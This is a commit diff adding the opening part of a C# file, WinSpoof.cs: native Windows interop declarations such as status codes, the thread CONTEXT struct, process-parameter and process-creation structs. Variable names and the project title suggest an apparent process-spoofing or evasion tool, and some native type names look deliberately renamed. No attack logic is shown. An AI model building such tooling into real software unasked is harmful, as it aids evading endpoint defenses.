Projects STRLCPY WinSpoof Commits 39748070
    WinSpoof.cs
     1 +using System;
     2 +using System.Runtime.InteropServices;
     3 +using System.Threading;
     4 +using System.Diagnostics;
     5 +using System.Linq;
     6 +using System.Collections.Generic;
     7 +using System.Security;
     8 +using System.Text;
     9 +
     10 +
     11 +namespace WinSpoof
     12 +{
     13 +
     14 + class Program
     15 + {
     16 + public static ulong ptrToGS = 0;
     17 + public static System.IO.MemoryMappedFiles.MemoryMappedFile MemMapSystemMem = null;
     18 + public static System.IO.MemoryMappedFiles.MemoryMappedViewAccessor MemMapViewAccessor = null;
     19 + public static UNICODE_STRING ImagePath;
     20 + public static RTL_USER_PROCESS_PARAMETERS_64 ProcessParams64 = new RTL_USER_PROCESS_PARAMETERS_64();
     21 + public static IntPtr ProcessParams = IntPtr.Zero;
     22 + public static ulong SuspendCount = 0;
     23 + public static IntPtr RemoteProcess = IntPtr.Zero;
     24 + public static IntPtr NewRemoteThread = IntPtr.Zero;
     25 + public static IntPtr processParameters = IntPtr.Zero;
     26 + public static IntPtr PtrToImagePath = IntPtr.Zero;
     27 + public static PsCreateInfo info = new PsCreateInfo();
     28 + public static PsAttributeList attributeList = new PsAttributeList();
     29 +
     30 + public enum NTSTATUS : uint
     31 + {
     32 + // Success
     33 + Success = 0x00000000,
     34 + Wait0 = 0x00000000,
     35 + Wait1 = 0x00000001,
     36 + Wait2 = 0x00000002,
     37 + Wait3 = 0x00000003,
     38 + Wait63 = 0x0000003f,
     39 + Abandoned = 0x00000080,
     40 + AbandonedWait0 = 0x00000080,
     41 + AbandonedWait1 = 0x00000081,
     42 + AbandonedWait2 = 0x00000082,
     43 + AbandonedWait3 = 0x00000083,
     44 + AbandonedWait63 = 0x000000bf,
     45 + UserApc = 0x000000c0,
     46 + KernelApc = 0x00000100,
     47 + Alerted = 0x00000101,
     48 + Timeout = 0x00000102,
     49 + Pending = 0x00000103,
     50 + Reparse = 0x00000104,
     51 + MoreEntries = 0x00000105,
     52 + NotAllAssigned = 0x00000106,
     53 + SomeNotMapped = 0x00000107,
     54 + OpLockBreakInProgress = 0x00000108,
     55 + VolumeMounted = 0x00000109,
     56 + RxActCommitted = 0x0000010a,
     57 + NotifyCleanup = 0x0000010b,
     58 + NotifyEnumDir = 0x0000010c,
     59 + NoQuotasForAccount = 0x0000010d,
     60 + PrimaryTransportConnectFailed = 0x0000010e,
     61 + PageFaultTransition = 0x00000110,
     62 + PageFaultDemandZero = 0x00000111,
     63 + PageFaultCopyOnWrite = 0x00000112,
     64 + PageFaultGuardPage = 0x00000113,
     65 + PageFaultPagingFile = 0x00000114,
     66 + CrashDump = 0x00000116,
     67 + ReparseObject = 0x00000118,
     68 + NothingToTerminate = 0x00000122,
     69 + ProcessNotInJob = 0x00000123,
     70 + ProcessInJob = 0x00000124,
     71 + ProcessCloned = 0x00000129,
     72 + FileLockedWithOnlyReaders = 0x0000012a,
     73 + FileLockedWithWriters = 0x0000012b,
     74 +
     75 + // Informational
     76 + Informational = 0x40000000,
     77 + ObjectNameExists = 0x40000000,
     78 + ThreadWasSuspended = 0x40000001,
     79 + WorkingSetLimitRange = 0x40000002,
     80 + ImageNotAtBase = 0x40000003,
     81 + RegistryRecovered = 0x40000009,
     82 +
     83 + // Warning
     84 + Warning = 0x80000000,
     85 + GuardPageViolation = 0x80000001,
     86 + DatatypeMisalignment = 0x80000002,
     87 + Breakpoint = 0x80000003,
     88 + SingleStep = 0x80000004,
     89 + BufferOverflow = 0x80000005,
     90 + NoMoreFiles = 0x80000006,
     91 + HandlesClosed = 0x8000000a,
     92 + PartialCopy = 0x8000000d,
     93 + DeviceBusy = 0x80000011,
     94 + InvalidEaName = 0x80000013,
     95 + EaListInconsistent = 0x80000014,
     96 + NoMoreEntries = 0x8000001a,
     97 + LongJump = 0x80000026,
     98 + DllMightBeInsecure = 0x8000002b,
     99 +
     100 + // Error
     101 + Error = 0xc0000000,
     102 + Unsuccessful = 0xc0000001,
     103 + NotImplemented = 0xc0000002,
     104 + InvalidInfoClass = 0xc0000003,
     105 + InfoLengthMismatch = 0xc0000004,
     106 + AccessViolation = 0xc0000005,
     107 + InPageError = 0xc0000006,
     108 + PagefileQuota = 0xc0000007,
     109 + InvalRunPEdle = 0xc0000008,
     110 + BadInitialStack = 0xc0000009,
     111 + BadInitialPc = 0xc000000a,
     112 + InvalidCid = 0xc000000b,
     113 + TimerNotCanceled = 0xc000000c,
     114 + InvalidParameter = 0xc000000d,
     115 + NoSuchDevice = 0xc000000e,
     116 + NoSuchFile = 0xc000000f,
     117 + InvalidDeviceRequest = 0xc0000010,
     118 + EndOfFile = 0xc0000011,
     119 + WrongVolume = 0xc0000012,
     120 + NoMediaInDevice = 0xc0000013,
     121 + NoMemory = 0xc0000017,
     122 + ConflictingAddresses = 0xc0000018,
     123 + NotMappedView = 0xc0000019,
     124 + UnableToFreeVm = 0xc000001a,
     125 + UnableToDeleteSection = 0xc000001b,
     126 + IllegalInstruction = 0xc000001d,
     127 + AlreadyCommitted = 0xc0000021,
     128 + AccessDenied = 0xc0000022,
     129 + BufferTooSmall = 0xc0000023,
     130 + ObjectTypeMismatch = 0xc0000024,
     131 + NonContinuableException = 0xc0000025,
     132 + BadStack = 0xc0000028,
     133 + NotLocked = 0xc000002a,
     134 + NotCommitted = 0xc000002d,
     135 + InvalidParameterMix = 0xc0000030,
     136 + ObjectNameInvalid = 0xc0000033,
     137 + ObjectNameNotFound = 0xc0000034,
     138 + ObjectNameCollision = 0xc0000035,
     139 + ObjectPathInvalid = 0xc0000039,
     140 + ObjectPathNotFound = 0xc000003a,
     141 + ObjectPathSyntaxBad = 0xc000003b,
     142 + DataOverrun = 0xc000003c,
     143 + DataLate = 0xc000003d,
     144 + DataError = 0xc000003e,
     145 + CrcError = 0xc000003f,
     146 + SectionTooBig = 0xc0000040,
     147 + PortConnectionRefused = 0xc0000041,
     148 + InvalidPortHandle = 0xc0000042,
     149 + SharingViolation = 0xc0000043,
     150 + QuotaExceeded = 0xc0000044,
     151 + InvalidPageProtection = 0xc0000045,
     152 + MutantNotOwned = 0xc0000046,
     153 + SemaphoreLimitExceeded = 0xc0000047,
     154 + PortAlreadySet = 0xc0000048,
     155 + SectionNotImage = 0xc0000049,
     156 + SuspendCountExceeded = 0xc000004a,
     157 + ThreadIsTerminating = 0xc000004b,
     158 + BadWorkingSetLimit = 0xc000004c,
     159 + IncompatibleFileMap = 0xc000004d,
     160 + SectionProtection = 0xc000004e,
     161 + EasNotSupported = 0xc000004f,
     162 + EaTooLarge = 0xc0000050,
     163 + NonExistentEaEntry = 0xc0000051,
     164 + NoEasOnFile = 0xc0000052,
     165 + EaCorruptError = 0xc0000053,
     166 + FileLockConflict = 0xc0000054,
     167 + LockNotGranted = 0xc0000055,
     168 + DeletePending = 0xc0000056,
     169 + CtlFileNotSupported = 0xc0000057,
     170 + UnknownRevision = 0xc0000058,
     171 + RevisionMismatch = 0xc0000059,
     172 + InvalidOwner = 0xc000005a,
     173 + InvalidPrimaryGroup = 0xc000005b,
     174 + NoImpersonationToken = 0xc000005c,
     175 + CantDisableMandatory = 0xc000005d,
     176 + NoLogonServers = 0xc000005e,
     177 + NoSuchLogonSession = 0xc000005f,
     178 + NoSuchPrivilege = 0xc0000060,
     179 + PrivilegeNotHeld = 0xc0000061,
     180 + InvalidAccountName = 0xc0000062,
     181 + UserExists = 0xc0000063,
     182 + NoSuchUser = 0xc0000064,
     183 + GroupExists = 0xc0000065,
     184 + NoSuchGroup = 0xc0000066,
     185 + MemberInGroup = 0xc0000067,
     186 + MemberNotInGroup = 0xc0000068,
     187 + LastAdmin = 0xc0000069,
     188 + WrongPassword = 0xc000006a,
     189 + IllFormedPassword = 0xc000006b,
     190 + PasswordRestriction = 0xc000006c,
     191 + LogonFailure = 0xc000006d,
     192 + AccountRestriction = 0xc000006e,
     193 + InvalidLogonHours = 0xc000006f,
     194 + InvalidWorkstation = 0xc0000070,
     195 + PasswordExpired = 0xc0000071,
     196 + AccountDisabled = 0xc0000072,
     197 + NoneMapped = 0xc0000073,
     198 + TooManyLuidsRequested = 0xc0000074,
     199 + LuidsExhausted = 0xc0000075,
     200 + InvalidSubAuthority = 0xc0000076,
     201 + InvalidAcl = 0xc0000077,
     202 + InvalidSid = 0xc0000078,
     203 + InvalidSecurityDescr = 0xc0000079,
     204 + ProcedureNotFound = 0xc000007a,
     205 + InvalidImageFormat = 0xc000007b,
     206 + NoToken = 0xc000007c,
     207 + BadInheritanceAcl = 0xc000007d,
     208 + RangeNotLocked = 0xc000007e,
     209 + DiskFull = 0xc000007f,
     210 + ServerDisabled = 0xc0000080,
     211 + ServerNotDisabled = 0xc0000081,
     212 + TooManyGuidsRequested = 0xc0000082,
     213 + GuidsExhausted = 0xc0000083,
     214 + InvalidIdAuthority = 0xc0000084,
     215 + AgentsExhausted = 0xc0000085,
     216 + InvalidVolumeLabel = 0xc0000086,
     217 + SectionNotExtended = 0xc0000087,
     218 + NotMappedData = 0xc0000088,
     219 + ResourceDataNotFound = 0xc0000089,
     220 + ResourceTypeNotFound = 0xc000008a,
     221 + ResourceNameNotFound = 0xc000008b,
     222 + ArrayBoundsExceeded = 0xc000008c,
     223 + FloatDenormalOperand = 0xc000008d,
     224 + FloatDivideByZero = 0xc000008e,
     225 + FloatInexactResult = 0xc000008f,
     226 + FloatInvalidOperation = 0xc0000090,
     227 + FloatOverflow = 0xc0000091,
     228 + FloatStackCheck = 0xc0000092,
     229 + FloatUnderflow = 0xc0000093,
     230 + IntegerDivideByZero = 0xc0000094,
     231 + IntegerOverflow = 0xc0000095,
     232 + PrivilegedInstruction = 0xc0000096,
     233 + TooManyPagingFiles = 0xc0000097,
     234 + FileInvalid = 0xc0000098,
     235 + InsufficientResources = 0xc000009a,
     236 + InstanceNotAvailable = 0xc00000ab,
     237 + PipeNotAvailable = 0xc00000ac,
     238 + InvalidPipeState = 0xc00000ad,
     239 + PipeBusy = 0xc00000ae,
     240 + IllegalFunction = 0xc00000af,
     241 + PipeDisconnected = 0xc00000b0,
     242 + PipeClosing = 0xc00000b1,
     243 + PipeConnected = 0xc00000b2,
     244 + PipeListening = 0xc00000b3,
     245 + InvalidReadMode = 0xc00000b4,
     246 + IoTimeout = 0xc00000b5,
     247 + FileForcedClosed = 0xc00000b6,
     248 + ProfilingNotStarted = 0xc00000b7,
     249 + ProfilingNotStopped = 0xc00000b8,
     250 + NotSameDevice = 0xc00000d4,
     251 + FileRenamed = 0xc00000d5,
     252 + CantWait = 0xc00000d8,
     253 + PipeEmpty = 0xc00000d9,
     254 + CantTerminateSelf = 0xc00000db,
     255 + InternalError = 0xc00000e5,
     256 + InvalidParameter1 = 0xc00000ef,
     257 + InvalidParameter2 = 0xc00000f0,
     258 + InvalidParameter3 = 0xc00000f1,
     259 + InvalidParameter4 = 0xc00000f2,
     260 + InvalidParameter5 = 0xc00000f3,
     261 + InvalidParameter6 = 0xc00000f4,
     262 + InvalidParameter7 = 0xc00000f5,
     263 + InvalidParameter8 = 0xc00000f6,
     264 + InvalidParameter9 = 0xc00000f7,
     265 + InvalidParameter10 = 0xc00000f8,
     266 + InvalidParameter11 = 0xc00000f9,
     267 + InvalidParameter12 = 0xc00000fa,
     268 + ProcessIsTerminating = 0xc000010a,
     269 + MappedFileSizeZero = 0xc000011e,
     270 + TooManyOpenedFiles = 0xc000011f,
     271 + Cancelled = 0xc0000120,
     272 + CannotDelete = 0xc0000121,
     273 + InvalidComputerName = 0xc0000122,
     274 + FileDeleted = 0xc0000123,
     275 + SpecialAccount = 0xc0000124,
     276 + SpecialGroup = 0xc0000125,
     277 + SpecialUser = 0xc0000126,
     278 + MembersPrimaryGroup = 0xc0000127,
     279 + FileClosed = 0xc0000128,
     280 + TooManyThreads = 0xc0000129,
     281 + ThreadNotInProcess = 0xc000012a,
     282 + TokenAlreadyInUse = 0xc000012b,
     283 + PagefileQuotaExceeded = 0xc000012c,
     284 + CommitmentLimit = 0xc000012d,
     285 + InvalidImageLeFormat = 0xc000012e,
     286 + InvalidImageNotMz = 0xc000012f,
     287 + InvalidImageProtect = 0xc0000130,
     288 + InvalidImageWin16 = 0xc0000131,
     289 + LogonServer = 0xc0000132,
     290 + DifferenceAtDc = 0xc0000133,
     291 + SynchronizationRequired = 0xc0000134,
     292 + DllNotFound = 0xc0000135,
     293 + IoPrivilegeFailed = 0xc0000137,
     294 + OrdinalNotFound = 0xc0000138,
     295 + EntryPointNotFound = 0xc0000139,
     296 + ControlCExit = 0xc000013a,
     297 + InvalidAddress = 0xc0000141,
     298 + PortNotSet = 0xc0000353,
     299 + DebuggerInactive = 0xc0000354,
     300 + CallbackBypass = 0xc0000503,
     301 + PortClosed = 0xc0000700,
     302 + MessageLost = 0xc0000701,
     303 + InvalidMessage = 0xc0000702,
     304 + RequestCanceled = 0xc0000703,
     305 + RecursiveDispatch = 0xc0000704,
     306 + LpcReceiveBufferExpected = 0xc0000705,
     307 + LpcInvalidConnectionUsage = 0xc0000706,
     308 + LpcRequestsNotAllowed = 0xc0000707,
     309 + ResourceInUse = 0xc0000708,
     310 + ProcessIsProtected = 0xc0000712,
     311 + VolumeDirty = 0xc0000806,
     312 + FileCheckedOut = 0xc0000901,
     313 + CheckOutRequired = 0xc0000902,
     314 + BadFileType = 0xc0000903,
     315 + FileTooLarge = 0xc0000904,
     316 + FormsAuthRequired = 0xc0000905,
     317 + VirusInfected = 0xc0000906,
     318 + VirusDeleted = 0xc0000907,
     319 + TransactionalConflict = 0xc0190001,
     320 + InvalidTransaction = 0xc0190002,
     321 + TransactionNotActive = 0xc0190003,
     322 + TmInitializationFailed = 0xc0190004,
     323 + RmNotActive = 0xc0190005,
     324 + RmMetadataCorrupt = 0xc0190006,
     325 + TransactionNotJoined = 0xc0190007,
     326 + DirectoryNotRm = 0xc0190008,
     327 + CouldNotResizeLog = 0xc0190009,
     328 + TransactionsUnsupportedRemote = 0xc019000a,
     329 + LogResizeInvalidSize = 0xc019000b,
     330 + RemoteFileVersionMismatch = 0xc019000c,
     331 + CrmProtocolAlreadyExists = 0xc019000f,
     332 + TransactionPropagationFailed = 0xc0190010,
     333 + CrmProtocolNotFound = 0xc0190011,
     334 + TransactionSuperiorExists = 0xc0190012,
     335 + TransactionRequestNotValid = 0xc0190013,
     336 + TransactionNotRequested = 0xc0190014,
     337 + TransactionAlreadyAborted = 0xc0190015,
     338 + TransactionAlreadyCommitted = 0xc0190016,
     339 + TransactionInvalidMarshallBuffer = 0xc0190017,
     340 + CurrentTransactionNotValid = 0xc0190018,
     341 + LogGrowthFailed = 0xc0190019,
     342 + ObjectNoLongerExists = 0xc0190021,
     343 + StreamMiniversionNotFound = 0xc0190022,
     344 + StreamMiniversionNotValid = 0xc0190023,
     345 + MiniversionInaccessibleFromSpecifiedTransaction = 0xc0190024,
     346 + CantOpenMiniversionWithModifyIntent = 0xc0190025,
     347 + CantCreateMoreStreamMiniversions = 0xc0190026,
     348 + HandleNoLongerValid = 0xc0190028,
     349 + NoTxfMetadata = 0xc0190029,
     350 + LogCorruptionDetected = 0xc0190030,
     351 + CantRecoverWithHandleOpen = 0xc0190031,
     352 + RmDisconnected = 0xc0190032,
     353 + EnlistmentNotSuperior = 0xc0190033,
     354 + RecoveryNotNeeded = 0xc0190034,
     355 + RmAlreadyStarted = 0xc0190035,
     356 + FileIdentityNotPersistent = 0xc0190036,
     357 + CantBreakTransactionalDependency = 0xc0190037,
     358 + CantCrossRmBoundary = 0xc0190038,
     359 + TxfDirNotEmpty = 0xc0190039,
     360 + IndoubtTransactionsExist = 0xc019003a,
     361 + TmVolatile = 0xc019003b,
     362 + RollbackTimerExpired = 0xc019003c,
     363 + TxfAttributeCorrupt = 0xc019003d,
     364 + EfsNotAllowedInTransaction = 0xc019003e,
     365 + TransactionalOpenNotAllowed = 0xc019003f,
     366 + TransactedMappingUnsupportedRemote = 0xc0190040,
     367 + TxfMetadataAlreadyPresent = 0xc0190041,
     368 + TransactionScopeCallbacksNotSet = 0xc0190042,
     369 + TransactionRequiredPromotion = 0xc0190043,
     370 + CannotExecuteFileInTransaction = 0xc0190044,
     371 + TransactionsNotFrozen = 0xc0190045,
     372 + MaximumNtStatus = 0xffffffff
     373 + }
     374 +
     375 +
     376 + // x64 context structure
     377 + [StructLayout(LayoutKind.Sequential, Pack = 16)]
     378 + public struct CONTEXT64
     379 + {
     380 + public ulong P1Home;
     381 + public ulong P2Home;
     382 + public ulong P3Home;
     383 + public ulong P4Home;
     384 + public ulong P5Home;
     385 + public ulong P6Home;
     386 +
     387 + public CONTEXT_FLAGS ContextFlags;
     388 + public uint MxCsr;
     389 +
     390 + public ushort SegCs;
     391 + public ushort SegDs;
     392 + public ushort SegEs;
     393 + public ushort SegFs;
     394 + public ushort SegGs;
     395 + public ushort SegSs;
     396 + public uint EFlags;
     397 +
     398 + public ulong Dr0;
     399 + public ulong Dr1;
     400 + public ulong Dr2;
     401 + public ulong Dr3;
     402 + public ulong Dr6;
     403 + public ulong Dr7;
     404 +
     405 + public ulong Rax;
     406 + public ulong Rcx;
     407 + public ulong Rdx;
     408 + public ulong Rbx;
     409 + public ulong Rsp;
     410 + public ulong Rbp;
     411 + public ulong Rsi;
     412 + public ulong Rdi;
     413 + public ulong R8;
     414 + public ulong R9;
     415 + public ulong R10;
     416 + public ulong R11;
     417 + public ulong R12;
     418 + public ulong R13;
     419 + public ulong R14;
     420 + public ulong R15;
     421 + public ulong Rip;
     422 +
     423 + public XSAVE_FORMAT64 DUMMYUNIONNAME;
     424 +
     425 + [MarshalAs(UnmanagedType.ByValArray, SizeConst = 26)]
     426 + public M128A[] VectorRegister;
     427 + public ulong VectorControl;
     428 +
     429 + public ulong DebugControl;
     430 + public ulong LastBranchToRip;
     431 + public ulong LastBranchFromRip;
     432 + public ulong LastExceptionToRip;
     433 + public ulong LastExceptionFromRip;
     434 + }
     435 +
     436 + public enum CONTEXT_FLAGS : uint
     437 + {
     438 + CONTEXT_i386 = 0x10000,
     439 + CONTEXT_i486 = 0x10000,
     440 + CONTEXT_CONTROL = CONTEXT_i386 | 0x01,
     441 + CONTEXT_INTEGER = CONTEXT_i386 | 0x02,
     442 + CONTEXT_SEGMENTS = CONTEXT_i386 | 0x04,
     443 + CONTEXT_FLOATING_POINT = CONTEXT_i386 | 0x08,
     444 + CONTEXT_DEBUG_REGISTERS = CONTEXT_i386 | 0x10,
     445 + CONTEXT_EXTENDED_REGISTERS = CONTEXT_i386 | 0x20,
     446 + CONTEXT_FULL = CONTEXT_CONTROL | CONTEXT_INTEGER | CONTEXT_SEGMENTS,
     447 + CONTEXT_ALL = CONTEXT_CONTROL | CONTEXT_INTEGER | CONTEXT_SEGMENTS | CONTEXT_FLOATING_POINT | CONTEXT_DEBUG_REGISTERS | CONTEXT_EXTENDED_REGISTERS
     448 + }
     449 +
     450 + [Flags]
     451 + public enum MemoryProtection : uint
     452 + {
     453 + AccessDenied = 0x0,
     454 + Execute = 0x10,
     455 + ExecuteRead = 0x20,
     456 + ExecuteReadWrite = 0x40,
     457 + ExecuteWriteCopy = 0x80,
     458 + Guard = 0x100,
     459 + NoCache = 0x200,
     460 + WriteCombine = 0x400,
     461 + NoAccess = 0x01,
     462 + ReadOnly = 0x02,
     463 + ReadWrite = 0x04,
     464 + WriteCopy = 0x08
     465 + }
     466 +
     467 + [StructLayout(LayoutKind.Explicit, Size = 8)]
     468 + public struct LARGE_INTEGER
     469 + {
     470 + [FieldOffset(0)] public long QuadPart;
     471 + [FieldOffset(0)] public uint LowPart;
     472 + [FieldOffset(4)] public int HighPart;
     473 + [FieldOffset(0)] public int LowPartAsInt;
     474 + [FieldOffset(0)] public uint LowPartAsUInt;
     475 + [FieldOffset(4)] public int HighPartAsInt;
     476 + [FieldOffset(4)] public uint HighPartAsUInt;
     477 +
     478 + public long ToInt64()
     479 + {
     480 + return ((long)this.HighPart << 32) | (uint)this.LowPartAsInt;
     481 + }
     482 + public static LARGE_INTEGER Convert(long value)
     483 + {
     484 + return new LARGE_INTEGER
     485 + {
     486 + LowPartAsInt = (int)(value),
     487 + HighPartAsInt = (int)((value >> 32))
     488 + };
     489 + }
     490 + }
     491 +
     492 + [Flags]
     493 + public enum CORE_Flags : uint
     494 + {
     495 + None = 0,
     496 + INHERIT = 1
     497 + }
     498 +
     499 + public enum CORE_INFORMATION_CLASS
     500 + {
     501 + ProcessBasicInformation = 0x00,
     502 + ProcessQuotaLimits = 0x01,
     503 + ProcessIoCounters = 0x02,
     504 + ProcessVmCounters = 0x03,
     505 + ProcessTimes = 0x04,
     506 + ProcessBasePriority = 0x05,
     507 + ProcessRaisePriority = 0x06,
     508 + ProcessDebugPort = 0x07,
     509 + ProcessExceptionPort = 0x08,
     510 + ProcessAccessToken = 0x09,
     511 + ProcessLdtInformation = 0x0A,
     512 + ProcessLdtSize = 0x0B,
     513 + ProcessDefaultHardErrorMode = 0x0C,
     514 + ProcessIoPortHandlers = 0x0D,
     515 + ProcessPooledUsageAndLimits = 0x0E,
     516 + ProcessWorkingSetWatch = 0x0F,
     517 + ProcessUserModeIOPL = 0x10,
     518 + ProcessEnableAlignmentFaultFixup = 0x11,
     519 + ProcessPriorityClass = 0x12,
     520 + ProcessWx86Information = 0x13,
     521 + ProcessHandleCount = 0x14,
     522 + ProcessAffinityMask = 0x15,
     523 + ProcessPriorityBoost = 0x16,
     524 + ProcessDeviceMap = 0x17,
     525 + ProcessSessionInformation = 0x18,
     526 + ProcessForegroundInformation = 0x19,
     527 + ProcessWow64Information = 0x1A,
     528 + ProcessImageFileName = 0x1B,
     529 + ProcessLUIDDeviceMapsEnabled = 0x1C,
     530 + ProcessBreakOnTermination = 0x1D,
     531 + ProcessDebugObjectHandle = 0x1E,
     532 + ProcessDebugFlags = 0x1F,
     533 + ProcessHandleTracing = 0x20,
     534 + ProcessIoPriority = 0x21,
     535 + ProcessExecuteFlags = 0x22,
     536 + ProcessResourceManagement = 0x23,
     537 + ProcessCookie = 0x24,
     538 + ProcessImageInformation = 0x25,
     539 + ProcessCycleTime = 0x26,
     540 + ProcessPagePriority = 0x27,
     541 + ProcessInstrumentationCallback = 0x28,
     542 + ProcessThreadStackAllocation = 0x29,
     543 + ProcessWorkingSetWatchEx = 0x2A,
     544 + ProcessImageFileNameWin32 = 0x2B,
     545 + ProcessImageFileMapping = 0x2C,
     546 + ProcessAffinityUpdateMode = 0x2D,
     547 + ProcessMemoryAllocationMode = 0x2E,
     548 + ProcessGroupInformation = 0x2F,
     549 + ProcessTokenVirtualizationEnabled = 0x30,
     550 + ProcessConsoleHostProcess = 0x31,
     551 + ProcessWindowInformation = 0x32,
     552 + ProcessHandleInformation = 0x33,
     553 + ProcessMitigationPolicy = 0x34,
     554 + ProcessDynamicFunctionTableInformation = 0x35,
     555 + ProcessHandleCheckingMode = 0x36,
     556 + ProcessKeepAliveCount = 0x37,
     557 + ProcessRevokeFileHandles = 0x38,
     558 + ProcessWorkingSetControl = 0x39,
     559 + ProcessHandleTable = 0x3A,
     560 + ProcessCheckStackExtentsMode = 0x3B,
     561 + ProcessCommandLineInformation = 0x3C,
     562 + ProcessProtectionInformation = 0x3D,
     563 + ProcessMemoryExhaustion = 0x3E,
     564 + ProcessFaultInformation = 0x3F,
     565 + ProcessTelemetryIdInformation = 0x40,
     566 + ProcessCommitReleaseInformation = 0x41,
     567 + ProcessDefaultCpuSetsInformation = 0x42,
     568 + ProcessAllowedCpuSetsInformation = 0x43,
     569 + ProcessSubsystemProcess = 0x44,
     570 + ProcessJobMemoryInformation = 0x45,
     571 + ProcessInPrivate = 0x46,
     572 + ProcessRaiseUMExceptionOnInvalidHandleClose = 0x47,
     573 + ProcessIumChallengeResponse = 0x48,
     574 + ProcessChildProcessInformation = 0x49,
     575 + ProcessHighGraphicsPriorityInformation = 0x4A,
     576 + ProcessSubsystemInformation = 0x4B,
     577 + ProcessEnergyValues = 0x4C,
     578 + ProcessActivityThrottleState = 0x4D,
     579 + ProcessActivityThrottlePolicy = 0x4E,
     580 + ProcessWin32kSyscallFilterInformation = 0x4F,
     581 + ProcessDisableSystemAllowedCpuSets = 0x50,
     582 + ProcessWakeInformation = 0x51,
     583 + ProcessEnergyTrackingState = 0x52,
     584 + ProcessManageWritesToExecutableMemory = 0x53,
     585 + ProcessCaptureTrustletLiveDump = 0x54,
     586 + ProcessTelemetryCoverage = 0x55,
     587 + ProcessEnclaveInformation = 0x56,
     588 + ProcessEnableReadWriteVmLogging = 0x57,
     589 + ProcessUptimeInformation = 0x58,
     590 + ProcessImageSection = 0x59,
     591 + ProcessDebugAuthInformation = 0x5A,
     592 + ProcessSystemResourceManagement = 0x5B,
     593 + ProcessSequenceNumber = 0x5C,
     594 + ProcessLoaderDetour = 0x5D,
     595 + ProcessSecurityDomainInformation = 0x5E,
     596 + ProcessCombineSecurityDomainsInformation = 0x5F,
     597 + ProcessEnableLogging = 0x60,
     598 + ProcessLeapSecondInformation = 0x61,
     599 + ProcessFiberShadowStackAllocation = 0x62,
     600 + ProcessFreeFiberShadowStackAllocation = 0x63,
     601 + MaxProcessInfoClass = 0x64
     602 + };
     603 +
     604 + [StructLayout(LayoutKind.Sequential)]
     605 + public struct RTL_USER_PROCESS_PARAMETERS_64
     606 + {
     607 + [MarshalAs(UnmanagedType.ByValArray, SizeConst = 16)]
     608 + public byte[] Reserved1;
     609 + [MarshalAs(UnmanagedType.ByValArray, SizeConst = 10)]
     610 + public IntPtr[] Reserved2;
     611 + public UNICODE_STRING64 CurrentDirectoryPath;
     612 + public UNICODE_STRING64 DllPath;
     613 + [MarshalAs(UnmanagedType.ByValArray, SizeConst = 2)]
     614 + public IntPtr[] Reserved2b;
     615 + public UNICODE_STRING64 ImagePathName;
     616 + public UNICODE_STRING64 CommandLine;
     617 + public UInt64 Environment;
     618 + [MarshalAs(UnmanagedType.ByValArray, SizeConst = 9)]
     619 + public IntPtr[] Reserved3;
     620 + public UNICODE_STRING64 WindowTitle;
     621 + public UNICODE_STRING64 DesktopName;
     622 + public UNICODE_STRING64 ShellInfo;
     623 + public UNICODE_STRING64 RuntimeData;
     624 + [MarshalAs(UnmanagedType.ByValArray, SizeConst = 32 * 6)]
     625 + public IntPtr[] Reserved4;
     626 + public uint EnvironmentSize;
     627 + }
     628 +
     629 + [System.Runtime.InteropServices.StructLayout(System.Runtime.InteropServices.LayoutKind.Sequential, Pack=0)]
     630 + public struct UNICODE_STRING
     631 + {
     632 + public ushort Length;
     633 + public ushort MaximumLength;
     634 + public IntPtr Buffer;
     635 + }
     636 +
     637 + [StructLayout(LayoutKind.Sequential)]
     638 + public struct UNICODE_STRING64
     639 + {
     640 + public ushort Length;
     641 + public ushort MaximumLength;
     642 + public UInt32 __padding;
     643 + public UInt64 Buffer;
     644 + }
     645 +
     646 + [System.Runtime.InteropServices.StructLayout(System.Runtime.InteropServices.LayoutKind.Sequential)]
     647 + public struct CORE_BASIS
     648 + {
     649 + public IntPtr ExitStatus;
     650 + public IntPtr PebBaseAddress;
     651 + public IntPtr AffinityMask;
     652 + public IntPtr BasePriority;
     653 + public IntPtr UniqueProcessId;
     654 + public IntPtr InheritedFromUniqueProcessId;
     655 + }
     656 +
     657 + // x64 save format
     658 + [StructLayout(LayoutKind.Sequential, Pack = 16)]
     659 + public struct XSAVE_FORMAT64
     660 + {
     661 + public ushort ControlWord;
     662 + public ushort StatusWord;
     663 + public byte TagWord;
     664 + public byte Reserved1;
     665 + public ushort ErrorOpcode;
     666 + public uint ErrorOffset;
     667 + public ushort ErrorSelector;
     668 + public ushort Reserved2;
     669 + public uint DataOffset;
     670 + public ushort DataSelector;
     671 + public ushort Reserved3;
     672 + public uint MxCsr;
     673 + public uint MxCsr_Mask;
     674 +
     675 + [MarshalAs(UnmanagedType.ByValArray, SizeConst = 8)]
     676 + public M128A[] FloatRegisters;
     677 +
     678 + [MarshalAs(UnmanagedType.ByValArray, SizeConst = 16)]
     679 + public M128A[] XmmRegisters;
     680 +
     681 + [MarshalAs(UnmanagedType.ByValArray, SizeConst = 96)]
     682 + public byte[] Reserved4;
     683 + }
     684 +
     685 + [StructLayout(LayoutKind.Sequential)]
     686 + public struct M128A
     687 + {
     688 + public ulong High;
     689 + public long Low;
     690 +
     691 + public override string ToString()
     692 + {
     693 + return string.Format("High:{0}, Low:{1}", this.High, this.Low);
     694 + }
     695 + }
     696 +
     697 + public static List<IntPtr> Allocated = new List<IntPtr>();
     698 + public static UNICODE_STRING ConvertToUnicode(string data)
     699 + {
     700 + UNICODE_STRING StringObject = new UNICODE_STRING();
     701 + StringObject.Length = (ushort)(data.Length * 2);
     702 + StringObject.MaximumLength = (ushort)(StringObject.Length + 1);
     703 + StringObject.Buffer = Marshal.StringToHGlobalUni(data);
     704 + Allocated.Add(StringObject.Buffer);
     705 + return StringObject;
     706 + }
     707 +
     708 + [StructLayout(LayoutKind.Explicit, Size = 88)]
     709 + public unsafe struct PsCreateInfo
     710 + {
     711 + [FieldOffset(0)] public UIntPtr Size;
     712 + [FieldOffset(8)] public PsCreateState State;
     713 + [FieldOffset(16)] public fixed byte Filter[72];
     714 + }
     715 +
     716 + public enum PsCreateState
     717 + {
     718 + PsCreateInitialState,
     719 + PsCreateFailOnFileOpen,
     720 + PsCreateFailOnSectionCreate,
     721 + PsCreateFailExeFormat,
     722 + PsCreateFailMachineMismatch,
     723 + PsCreateFailExeName,
     724 + PsCreateSuccess,
     725 + PsCreateMaximumStates
     726 + }
     727 +
     728 + [StructLayout(LayoutKind.Sequential)]
     729 + public struct PsAtrribute
     730 + {
     731 + public uint Attribute;
     732 + public UIntPtr Size;
     733 + public IntPtr Value;
     734 + public IntPtr ReturnLength;
     735 +
     736 + }
     737 +
